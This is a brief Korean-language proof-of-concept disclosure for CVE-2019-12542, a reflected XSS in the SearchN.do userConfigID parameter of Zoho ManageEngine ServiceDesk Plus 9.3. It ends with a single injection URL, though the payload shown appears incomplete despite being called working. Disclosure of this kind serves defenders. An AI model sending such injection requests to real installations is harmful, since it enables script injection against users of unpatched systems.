
CVE-2019-12542에 대한 개념 증명: Zoho ManageEngine ServiceDesk Plus 9.3에서 SearchN.do userConfigID 매개변수를 통한 XSS 취약점, 작동하는 페이로드 포함.
정보 설명: Zoho ManageEngine ServiceDesk Plus 9.3에서 문제가 발견되었습니다. SearchN.do의 userConfigID 매개변수를 통해 XSS가 발생합니다.
작성자: Concobe of Tarantula Team - VinCSS (Vingroup 소속)
domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=1">&selectName=Site